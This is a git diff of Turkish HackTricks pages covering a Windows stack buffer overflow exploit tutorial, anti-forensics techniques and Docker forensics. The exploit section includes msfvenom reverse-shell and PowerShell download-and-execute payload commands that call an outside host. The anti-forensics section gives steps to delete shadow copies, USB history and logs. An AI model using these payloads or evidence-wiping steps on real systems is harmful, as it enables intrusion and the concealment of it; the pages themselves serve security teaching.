Bu tamponla EIP çökmesi 42424242 ("BBBB")'ye işaret etmelidir.
Bu tamponla EIP çöktüğünde 42424242 ("BBBB")'ye işaret etmelidir.
![](<../.gitbook/assets/image (30) (1) (1).png>)
@ -125,25 +99,27 @@ Görünüşe göre çalışıyor.
## Stack içinde Shellcode alanını kontrol et
600B, herhangi bir güçlü shellcode için yeterli olmalıdır.
Güçlü bir shellcode için 600B yeterli olmalıdır.
Hadi tamponu değiştirelim:
Şimdi tamponu değiştirelim:
```
buffer = 'A'*2606 + 'BBBB' + 'C'*600
```
Yeni saldırıyı başlatın ve kullanışlı shellcode'un EBP ve uzunluğunu kontrol edin
```html
Başlatılan yeni açığı kullanın ve EBP'yi kontrol edin ve kullanışlı shellcode'un uzunluğunu kontrol edin
![](<../.gitbook/assets/image (31) (1).png>)
![](<../.gitbook/assets/image (32) (1).png>)
Görüldüğü gibi, zafiyet ulaşıldığında, EBP shellcode'a işaret ediyor ve burada bir shellcode yerleştirmek için çok fazla alanımız var.
Zafiyet ulaşıldığında EBP'nin shellcode'a işaret ettiğini ve burada bir shellcode yerleştirmek için bolca alanımız olduğunu görebilirsiniz.
Bu durumda **0x0209A128'den 0x0209A2D6'ya kadar = 430B**. Yeterli.
Bu durumda **0x0209A128'den 0x0209A2D6'ya kadar = 430B.** Yeterli.
## Kötü karakterleri kontrol edin
Buffer'ı tekrar değiştirin:
Yine tamponu değiştirin:
```
```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
@ -165,55 +141,55 @@ badchars = (
)
buffer = 'A'*2606 + 'BBBB' + badchars
```
Kötü karakterler genellikle 0x00 olduğu için, kötü karakterler 0x01'den başlar.
Badchars 0x01'den başlar çünkü genellikle 0x00 kötüdür.
Bu yeni tamponla tekrar tekrar saldırıyı gerçekleştirin ve kullanışsız olduğu tespit edilen karakterleri silin:
Bu yeni tamponla tekrar tekrar saldırıyı yürütün ve gereksiz bulunan karakterleri silin:
Örneğin:
Bu durumda **0x0A karakterini kullanmamalısınız** (0x09 karakterinden sonra bellekte hiçbir şey kaydedilmez).
Bu durumda **0x0A karakterini kullanmamalısınız** (0x09 karakterinde hiçbir şey belleğe kaydedilmez).
![](<../.gitbook/assets/image (33) (1).png>)
Bu durumda **0x0D karakteri kaçınılmalıdır**:
Bu durumda **0x0D karakterinden kaçınılır**:
![](<../.gitbook/assets/image (34) (1).png>)
## Bir JMP ESP'yi dönüş adresi olarak bulma
## Bir JMP ESP bulun ve geri dönüş adresi olarak kullanın
Kullanarak:
```
!mona modules #Get protections, look for all false except last one (Dll of SO)
```
Bellek haritalarını **listelersiniz**. Şu özelliklere sahip bir DLL arayın:
**Bellek haritalarını listeleyeceksiniz**. Şu özelliklere sahip bir DLL arayın:
* **Rebase: False**
* **SafeSEH: False**
* **ASLR: False**
* **NXCompat: False**
* **OS Dll: True**
* **Yer Değiştirme: Yanlış**
* **SafeSEH: Yanlış**
* **ASLR: Yanlış**
* **NX Uyumluluğu: Yanlış**
* **İşletim Sistemi DLL'si: Doğru**
![](<../.gitbook/assets/image (35) (1).png>)
Şimdi, bu bellek içinde JMP ESP baytlarını bulmanız gerekiyor, bunu yapmak için şunu çalıştırın:
Şimdi, bu bellek içinde birkaç JMP ESP baytı bulmanız gerekiyor, bunu yapmak için şunu çalıştırın:
```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
```
**Ardından, bir adres bulunursa, herhangi bir kötü karakter içermeyen bir adres seçin:**
**Ardından, eğer bir adres bulunursa, kötü karakter içermeyen bir adres seçin:**
![](<../.gitbook/assets/image (36) (1).png>)
**Bu durumda, örneğin: \_0x5f4a358f**\_
## Kabuk kodu oluşturma
## Kabuk kodu oluşturun
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
```
Eğer exploit çalışmıyorsa ancak çalışması gerekiyorsa (ImDebg ile shellcode'a ulaşıldığını görebilirsiniz), aynı parametrelerle farklı shellcode'lar oluşturmak için başka shellcode'lar oluşturmayı deneyin (msfvenom kullanın).
Eğer exploit çalışmıyorsa ama çalışması gerekiyorsa (ImDebg ile shellcode'a ulaşıldığını görebilirsiniz), farklı shellcodelar oluşturmak için msfvenom'u kullanın (aynı parametreler için farklı shellcodelar oluşturur).
Shellcode'un başına **bazı NOPS ekleyin** ve onu ve dönüş adresini JMP ESP'ye kullanarak exploit'i tamamlayın:
Shellcode'un başına **bazı NOPS'lar ekleyin** ve onu ve return adresini JMP ESP'ye yönlendirmek için kullanın ve exploit'i tamamlayın:
```bash
#!/usr/bin/python
@ -263,25 +239,26 @@ except:
print "Could not connect to "+ip+":"+port
```
{% hint style="warning" %}
Kendilerini **üzerine yazacak** kabuk kodları vardır, bu yüzden kabuk kodundan önce her zaman biraz NOP eklemek önemlidir.
Kendilerini **üzerine yazacak** kabuk kodları bulunmaktadır, bu nedenle kabuk kodundan önce her zaman bir miktar NOP eklemek önemlidir
{% endhint %}
## Kabuk kodunu iyileştirme
## Kabuk kodunu geliştirme
Bu parametreleri ekleyin:
```
EXITFUNC=thread -e x86/shikata_ga_nai
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* Hacking hilelerinizi **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek destek olun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -24,11 +25,11 @@ Zaman damgalarını MFT içindeki `$STANDARD_INFORMATION` ve `$FILE_NAME` öznit
Her iki öznitelik de 4 zaman damgasına sahiptir: **Değiştirme**, **erişim**, **oluşturma** ve **MFT kayıt değiştirme** (MACE veya MACB).
**Windows gezgini** ve diğer araçlar, bilgileri **`$STANDARD_INFORMATION`** özniteliğinden gösterir.
**Windows Gezgini** ve diğer araçlar bilgileri **`$STANDARD_INFORMATION`**'dan gösterir.
## TimeStomp - Anti-forensik Aracı
## TimeStomp - Anti-forensic Aracı
Bu araç, zaman damgası bilgilerini **`$STANDARD_INFORMATION`** içinde **değiştirir** **ancak** **`$FILE_NAME`** içindeki bilgileri **değiştirmez**. Bu nedenle, **şüpheli aktiviteyi tanımlamak mümkündür**.
Bu araç, zaman damgası bilgilerini **`$STANDARD_INFORMATION`** içinde **değiştirir** ancak **`$FILE_NAME`** içindeki bilgileri **değiştirmez**. Bu nedenle, **şüpheli aktiviteleri tanımlamak mümkündür**.
## Usnjrnl
@ -46,7 +47,7 @@ Bir dosya sistemindeki **tüm meta veri değişiklikleri**, [önceden yazma gün
Yine, aracın çıktısında **bazı değişikliklerin yapıldığı** görülebilir.
Aynı araç kullanılarak **zaman damgalarının ne zaman değiştirildiğini** belirlemek mümkündür:
Aynı araç kullanılarak **zaman damgalarının ne zaman değiştirildiği** belirlenebilir:
![](<../../.gitbook/assets/image (451).png>)
@ -63,9 +64,9 @@ Aynı araç kullanılarak **zaman damgalarının ne zaman değiştirildiğini**
**NTFS** zaman damgalarının **100 nanosaniye** hassasiyeti vardır. Dolayısıyla, 2010-10-10 10:10:**00.000:0000 gibi zaman damgalarına sahip dosyalar bulmak çok **şüphelidir**.
## SetMace - Anti-forensik Aracı
## SetMace - Anti-forensic Aracı
Bu araç, hem `$STARNDAR_INFORMATION` hem de `$FILE_NAME` özniteliklerini değiştirebilir. Ancak, Windows Vista'dan itibaren, bu bilgileri değiştirmek için canlı bir işletim sistemi gereklidir.
Bu araç, hem `$STARNDAR_INFORMATION` hem de `$FILE_NAME` özniteliklerini değiştirebilir. Ancak, Windows Vista'dan itibaren bu bilgileri değiştirmek için canlı bir işletim sistemi gereklidir.
# Veri Gizleme
@ -75,16 +76,16 @@ Bu "gizli" alanda veri gizlemeyi sağlayan slacker gibi araçlar vardır. Ancak,
![](<../../.gitbook/assets/image (452).png>)
Dolayısıyla, FTK Imager gibi araçlar kullanılarak bu yarım alanı kurtarmak mümkündür. Bu tür bir aracın içeriği şifreli veya hatta şifrelenmiş olarak kaydedebileceğini unutmayın.
Dolayısıyla, FTK Imager gibi araçlar kullanılarak yarım alan alınabilir. Bu tür bir aracın içeriği şifreli veya hatta şifrelenmiş olarak kaydedebileceğini unutmayın.
# UsbKill
Bu, **USB bağlantı noktalarında herhangi bir değişiklik algılandığında bilgisayarı kapatacak bir araçtır**.\
Bu, USB bağlantı noktalarında herhangi bir değişiklik algılandığında bilgisayarı **kapatacak bir araçtır**.\
Bunu keşfetmenin bir yolu, çalışan işlemleri incelemek ve **çalışan her python betiğini gözden geçirmektir**.
# Canlı Linux Dağıtımları
Bu dağıtımlar **RAM bellek içinde yürütülür**. Bunları tespit etmenin tek yolu, NTFS dosya sisteminin yazma izinleriyle bağlandığı durumlardır. Salt okuma izinleriyle bağlandığında, sızma algılanamaz.
Bu dağıtımlar **RAM bellek içinde yürütülür**. Bunları tespit etmenin tek yolu, NTFS dosya sisteminin yazma izinleriyle bağlandığı durumlarda mümkündür. Salt okuma izinleriyle bağlandığında, sızma algılanamaz.
# Güvenli Silme
@ -92,7 +93,7 @@ Bu dağıtımlar **RAM bellek içinde yürütülür**. Bunları tespit etmenin t
# Windows Yapılandırması
Forensik incelemeyi zorlaştırmak için çeşitli Windows günlükleme yöntemlerini devre dışı bırakmak mümkündür.
Dijital delillerin incelenmesini zorlaştırmak için çeşitli Windows günlükleme yöntemlerini devre dışı bırakmak mümkündür.
## Zaman Damgalarını Devre Dışı Bırakma - UserAssist
@ -100,37 +101,37 @@ Bu, her bir yürütülebilir dosyanın kullanıcı tarafından çalıştırıld
UserAssist'in devre dışı bırakılması için iki adım gereklidir:
1. UserAssist'in devre dışı bırakılmasını istediğimizi belirtmek için `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` ve `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled` adlı iki kayıt defteri anahtarı değerini sıfıra ayarlayın.
1. `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` ve `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled` olmak üzere iki kayıt defteri anahtarı sıfıra ayarlanmalıdır.
2. `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>` gibi görünen kayıt defteri alt ağaçlarını temizleyin.
## Zaman Damgalarını Devre Dışı Bırakma - Prefetch
Bu, Windows sisteminin performansını artırmak amacıyla çalıştırılan uygulamalar hakkında bilgi saklar. Ancak, bu aynı zamanda adli bilişim uygulamaları için de faydalı olabilir.
Bu, Windows sisteminin performansını artırmak amacıyla çalıştırılan uygulamalar hakkında bilgi saklar. Ancak, bu aynı zamanda dijital deliller uygulamaları için de faydalı olabilir.
* `regedit`i çalıştırın
* Dosya yolunu seçin `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
* Dosya yolunu `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` olarak seçin
* Hem `EnablePrefetcher` hem de `EnableSuperfetch` üzerinde sağ tıklayın
* Her birini değiştirmek için Değiştir'i seçerek değeri 1'den (veya 3'ten) 0'a değiştirin
* Yeniden başlatın
## Zaman Damgalarını Devre Dışı Bırakma - Son Erişim Zamanı
Bir NTFS birimindeki bir klasör açıldığında, sistem her listelenen klasörde **bir zaman damgası alanını günceller** ve buna son erişim zamanı denir. Yoğun kullanılan bir NTFS biriminde, bu performansı etkileyebilir.
Bir NTFS birimindeki bir klasör Windows NT sunucusunda ıldığında, sistem her listelenen klasörde **bir zaman damgası alanını günceller**, bu alana son erişim zamanı denir. Yoğun kullanılan bir NTFS biriminde, bu performansı etkileyebilir.
1. Kayıt Defteri Düzenleyici'yi (Regedit.exe) açın.
2. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`'e göz atın.
3. `NtfsDisableLastAccessUpdate`'i arayın. Var olmazsa, bu DWORD'u ekleyin ve değerini 1 olarak ayarlayın, bu işlemi devre dışı bırakacaktır.
3. `NtfsDisableLastAccessUpdate`'i arayın. Mevcut değilse, bu DWORD'u ekleyin ve değerini 1 olarak ayarlayın, bu işlemi devre dışı bırakacaktır.
4. Kayıt Defteri Düzenleyici'ni kapatın ve sunucuyu yeniden başlatın.
## USB Geçmişini Silme
Tüm **USB Aygıt Girişleri**, PC'nize veya Dizüstü Bilgisayarınıza bir USB Aygıtı takıldığında oluşturulan alt anahtarlar içeren **USBSTOR** kaydı altında Windows Kayıt Defterinde saklanır. Bu anahtarı burada bulabilirsiniz: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Bunu silerek** USB geçmişini silebilirsiniz.\
Tüm **USB Aygıt Girişleri**, PC'nize veya Dizüstü Bilgisayarınıza bir USB Aygıtı takıldığında oluşturulan alt anahtarlar içeren **USBSTOR** kayıt defteri anahtarı altında Windows Kayıt Defterinde saklanır. Bu anahtarı burada bulabilirsiniz `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. Bunları silerek USB geçmişini silebilirsiniz.\
Ayrıca [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) aracını kullanarak bunları sildiğinizden emin olabilirsiniz (ve silmek için).
USB'ler hakkında bilgi saklayan başka bir dosya, `C:\Windows\INF` içindeki `setupapi.dev.log` dosyasıdır. Bu da silinmelidir.
USB'ler hakkında bilgi saklayan başka bir dosya, `C:\Windows\INF` içindeki `setupapi.dev.log` dosyasıdır. Bu dosya da silinmelidir.
## Gölge Kopyalarını Devre Dışı Bırakma
`vssadmin list shadowstorage` komutu ile gölge kopyaları **listele**\
`vssadmin list shadowstorage` komutunu kullanarak gölge kopyaları **listele**\
Onları silmek için `vssadmin delete shadow` komutunu çalıştırın
Ayrıca [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) adresinde önerilen adımları takip ederek GUI üzerinden de silebilirsiniz.
@ -139,13 +140,13 @@ Gölge kopyalarını devre dışı bırakmak için [buradan adımları](https://
1. Windows başlat düğmesine tıkladıktan sonra metin arama kutusuna "services" yazarak Hizmetler programınıın.
2. Listeden "Volume Shadow Copy" bulun, seçin ve ardından sağ tıklayarak Özelliklere erişin.
3. "Başlangıç türü" açılır menüsünden Devre Dışı seçin ve ardından Değişiklikleri uygulamak ve Tamam'a tıklayarak değişikliği onaylayın.
3. "Başlangıç türü" açılır menüsünden Devre Dışı seçin ve Değişikliği uygulamak ve Tamam'a tıklayarak değişikliği onaylayın.
Ayrıca hangi dosyaların gölge kopyasının alınacağının yapılandırmasını kayıt defterinde `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` değiştirme olasılığı vardır.
Ayrıca hangi dosyaların gölge kopyasının alınacağının yapılandırmasını kayıt defterinde `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` değiştirmek de mümkündür.
## Silinen Dosyaları Üzerine Yazma
* `cipher /w:C` komutunu kullanarak **Windows aracını** kullanabilirsiniz: Bu, C sürücüsündeki kullanılmayan disk alanından verileri kaldırması için cipher'a işaret eder.
* Bir **Windows aracı** kullanabilirsiniz: `cipher /w:C` Bu, cipher'ın C sürücüsü içindeki kullanılmayan disk alanından verileri kaldırmasını sağlar.
* [**Eraser**](https://eraser.heidi.ie) gibi araçları da kullanabilirsiniz
## Windows Olay Günlüklerini Silme
@ -167,3 +168,19 @@ Ayrıca hangi dosyaların gölge kopyasının alınacağının yapılandırması
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarını göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
</details>
{% endhint %}

View file

@ -1,28 +1,29 @@
# Docker Forensiği
# Docker Adli Bilişim
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan ileri seviyeye öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* Hacking hilelerinizi **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Konteyner değişikliği
## Konteyner Değişikliği
Bir docker konteynerinin bazı şekilde tehlikeye atıldığından şüpheleniliyor:
Bazı docker konteynerinin tehlikeye atıldığına dair şüpheler var:
```bash
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
Bu konteynerde yapılan değişiklikleri görmeniz için şunları yapabilirsiniz:
Aşağıdaki komutla bu konteynıra yapılan değişiklikleri görüntüleyebilirsiniz:
```bash
docker diff wordpress
C /var
@ -36,52 +37,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV
...
```
Önceki komutta **C** **Değiştirildi** ve **A,** **Eklendi** anlamına gelir.\
Eğer `/etc/shadow` gibi ilginç bir dosyanın değiştirildiğini tespit ederseniz, kötü amaçlı faaliyetleri kontrol etmek için bu dosyayı konteynırdan indirebilirsiniz:
Önceki komutta **C** **Değiştirildi** anlamına gelir ve **A,** **Eklendi** anlamına gelir.\
Eğer `/etc/shadow` gibi ilginç bir dosyanın değiştirildiğini fark ederseniz, kötü amaçlı faaliyetleri kontrol etmek için dosyayı konteynerden indirebilirsiniz:
```bash
docker cp wordpress:/etc/shadow.
```
Ayrıca, yeni bir konteyner çalıştırarak ve içinden dosyayı çıkararak orijinaliyle **karşılaştırabilirsiniz**:
Ayrıca, yeni bir konteyner çalıştırarak ve dosyayı ondan çıkararak **orijinaliyle karşılaştırabilirsiniz**:
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
diff original_shadow shadow
```
Eğer **şüpheli bir dosya eklenmişse** konteynere erişebilir ve kontrol edebilirsiniz:
Eğer **şüpheli bir dosyanın eklendiğini** tespit ederseniz, konteynıra erişebilir ve kontrol edebilirsiniz:
```bash
docker exec -it wordpress bash
```
## Görüntü değişiklikleri
## Resim Modifikasyonları
Bir dışa aktarılmış docker görüntüsü (muhtemelen `.tar` formatında) verildiğinde, [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) kullanarak **değişikliklerin bir özetini çıkarmak** için aşağıdaki adımları izleyebilirsiniz:
Size bir dışa aktarılmış docker imajı verildiğinde (muhtemelen `.tar` formatında) **modifikasyonların özetini çıkarmak** için [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) kullanabilirsiniz:
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
Ardından, görüntüyü **sıkıştırılmış** hâlden çıkarabilir ve şüpheli dosyaları aramak için **bloklara erişebilirsiniz**. Bu dosyaları değişiklik geçmişinde bulmuş olabilirsiniz:
Ardından, görüntüyü **çözebilir** ve şüpheli dosyalar aramak için **bloklara erişebilirsiniz** bulduğunuz değişiklik geçmişinde:
```bash
tar -xf image.tar
```
### Temel Analiz
Çalışan görüntüden **temel bilgiler** alabilirsiniz:
Çalışan görüntüden **temel bilgileri** alabilirsiniz:
```bash
docker inspect <image>
```
Ayrıca, bir özet **değişiklik geçmişi** alabilirsiniz:
Ayrıca bir özet **değişiklik geçmişi** alabilirsiniz:
```bash
docker history --no-trunc <image>
```
Ayrıca bir görüntüden bir **dockerfile oluşturabilirsiniz**:
Ayrıca bir görüntüden bir **dockerfile oluşturabilirsiniz** şu şekilde:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Dive
### Dalış
Docker görüntülerinde eklenen/değiştirilen dosyaları bulmak için [**dive**](https://github.com/wagoodman/dive) (indirin: [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) aracını da kullanabilirsiniz:
Docker görüntülerinde eklenen/değiştirilen dosyaları bulmak için [**dive**](https://github.com/wagoodman/dive) aracını da kullanabilirsiniz (indirmek için [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) sayfasına gidin):
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1
@ -90,30 +91,31 @@ Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
Bu, farklı docker görüntülerinin farklı bloblarında gezinmenizi sağlar ve hangi dosyaların değiştirildiğini/eklendiğini kontrol edebilirsiniz. **Kırmızı** eklenen anlamına gelir ve **sarı** değiştirilen anlamına gelir. Diğer görünüme geçmek için **tab** tuşunu kullanın ve klasörleri daraltmak/açmak için **boşluk** tuşunu kullanın.
Bu, Docker görüntülerinin farklı blokları arasında gezinmenizi sağlar ve hangi dosyaların değiştirildiğini/eklendiğini kontrol edebilirsiniz. **Kırmızı** eklenen anlamına gelir ve **sarı** değiştirilen anlamına gelir. Diğer görünüme geçmek için **tab** tuşunu kullanın ve klasörleri kapatmak/açmak için **boşluk** tuşunu kullanın.
Die ile görüntünün farklı aşamalarının içeriğine erişemezsiniz. Bunun için her katmanı açmanız ve erişmeniz gerekecektir.\
Görüntünün tüm katmanlarını açmak için görüntünün açıldığı dizinde aşağıdaki komutu çalıştırın:
Die ile görüntünün farklı aşamalarının içeriğine erişemezsiniz. Bunun için **her katmanı açmanız ve erişmeniz gerekir**.\
Görüntünün tüm katmanlarını açmak için görüntünün açıldığı dizinden şu komutu çalıştırarak açabilirsiniz:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## Bellekten Kimlik Bilgileri
Docker konteynerini bir ana bilgisayar içinde çalıştırdığınızda, ana bilgisayardan sadece `ps -ef` komutunu çalıştırarak konteynerde çalışan işlemleri görebilirsiniz.
